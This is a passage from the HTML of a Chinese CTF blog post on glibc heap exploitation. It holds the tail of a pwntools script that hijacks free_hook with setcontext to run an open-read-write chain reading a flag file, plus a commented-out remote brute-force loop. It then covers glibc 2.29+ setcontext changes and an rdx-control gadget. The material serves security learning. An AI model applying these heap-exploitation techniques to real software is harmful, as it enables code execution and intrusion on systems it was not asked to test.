class="number">0</span>)*<span class="number">9</span>)</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">5</span>):</span><br><span class="line">		add(<span class="number">0x10</span>)</span><br><span class="line">	add(<span class="number">0x18</span>)</span><br><span class="line">	edit(p64(heap_base+<span class="number">0x50</span>))</span><br><span class="line">	add(<span class="number">0x38</span>)</span><br><span class="line"></span><br><span class="line">	orw_addr = heap_base+<span class="number">0x1000</span></span><br><span class="line"></span><br><span class="line">	payload = p64(free_hook)</span><br><span class="line">	payload += p64(heap_base+<span class="number">0x2000</span>)</span><br><span class="line">	payload += p64(heap_base+<span class="number">0x20A0</span>)</span><br><span class="line">	payload += p64(heap_base+<span class="number">0x2000</span>)</span><br><span class="line">	payload += p64(orw_addr+<span class="number">0x60</span>) + p64(orw_addr)</span><br><span class="line">	payload += p64(<span class="number">0</span>)</span><br><span class="line">	edit(payload)</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x10</span>)</span><br><span class="line">	edit(p64(setcontext))</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x20</span>)</span><br><span class="line">	edit(<span class="string">&quot;./flag\x00&quot;</span>)</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x30</span>)</span><br><span class="line">	pl = p64(orw_addr) + p64(pop_rdi_ret+<span class="number">1</span>)</span><br><span class="line">	edit(pl)</span><br><span class="line"></span><br><span class="line">	add(<span class="number">0x60</span>)</span><br><span class="line">	edit(orw[:<span class="number">0x60</span>])</span><br><span class="line">	add(<span class="number">0x50</span>)</span><br><span class="line">	edit(orw[<span class="number">0x60</span>:])</span><br><span class="line"></span><br><span class="line">	delete()</span><br><span class="line">	itr()</span><br><span class="line"></span><br><span class="line"><span class="comment">#爆破</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">i = 0</span></span><br><span class="line"><span class="string">while 1:</span></span><br><span class="line"><span class="string">	i += 1</span></span><br><span class="line"><span class="string">	log.warn(str(i))</span></span><br><span class="line"><span class="string">	try:  </span></span><br><span class="line"><span class="string">		pwn()</span></span><br><span class="line"><span class="string">	except Exception:</span></span><br><span class="line"><span class="string">		p.close()</span></span><br><span class="line"><span class="string">		if(local == 1):</span></span><br><span class="line"><span class="string">			p = process(binary)</span></span><br><span class="line"><span class="string">		else:</span></span><br><span class="line"><span class="string">			p = remote(ip,port)</span></span><br><span class="line"><span class="string">		continue</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">	pwn()</span><br></pre></td></tr></table></figure>

<h3 id="高版本GLIBC-SETCONTEXT的变化"><a href="#高版本GLIBC-SETCONTEXT的变化" class="headerlink" title="高版本GLIBC-SETCONTEXT的变化"></a>高版本GLIBC-SETCONTEXT的变化</h3><p>在GLIBC版本为2.29开始，setcontext的索引就从rdi改成了rdx</p>
<p>如图：</p>
<p><img src="https://assets.b3logfile.com/siyuan/1637149294294/assets/image-20220331101937-43imdve.png" alt="image.png"></p>
<p>如果我们按照之前的思路的话，需要我们先通过ROP控制RDX的值。众所周知利用gadget控制rdx的寄存器比较困难。那么这样的话我们需要找到一些比较方便的gadget去间接控制rdx寄存器。</p>
<h4 id="gadget"><a href="#gadget" class="headerlink" title="gadget"></a>gadget</h4><p>第一个是getkeyserv_handle+576</p>
<p>可以通过这个gadget通过rdi来控制rdx寄存器（适用版本为Glibc2.29到2.32</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mov     rdx, [rdi+<span class="number">8</span>]</span><br><span class="line">mov     [rsp+0C8h+var_C8], rax</span><br><span class="line">call    qword ptr [rdx+20h]</span><br></pre></td></tr></table></figure>

<h3 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h3><p>总结下利用的方法来巩固自己的知识，也希望能帮助到像我一样迷茫的人。如有错误请斧正。</p>
<h3 id="参考链接："><a href="#参考链接：" class="headerlink" title="参考链接："></a>参考链接：</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/118268484">(9条消息) pwn题堆利用的一些姿势 – setcontext___lifanxin的博客-CSDN博客</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/A951860555/article/details/116910945">(9条消息) 2021第十四届全国大学生信息安全竞赛WP（CISCN）– pwn部分___lifanxin的博客-CSDN博客_信息安全国赛</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_39869547/article/details/102765092">(9条消息) tcache的利用方法_qq_39869547的博客-CSDN博客_tcache</a></p>
<p><a target="_blank" rel="noopener" href="https://www.anquanke.com/post/id/236832">PWN堆溢出技巧：ORW的解题手法与万金油Gadgets - 安全客，安全资讯平台 (anquanke.com)</a></p>
</div>
</article>

  </main>
  <aside>
    <p>This is an `aside`, a useful place to put information of any kind: metadata about the site author (with or without pictures), brief information about the purposes of the site, a static collection of external links or anything else.</p>
<p>For some Classless themes pictures and data about the author may suit better in the `cover` and `description` site attributes (see `config.toml`), but most of the times that kind of information will fit here better.</p>

  </aside>
  <footer role="contentinfo">
    <p>A default site footer. If you don't know what to place here maybe you should just write your name plus the current year?</p>
<p>If you want to have a sitemap, a contact form or other complex stuff, most Classless themes will also handle it nicely. Or you can take a look at the <code>aside.html</code> partial.</p>

  </footer>
</body>
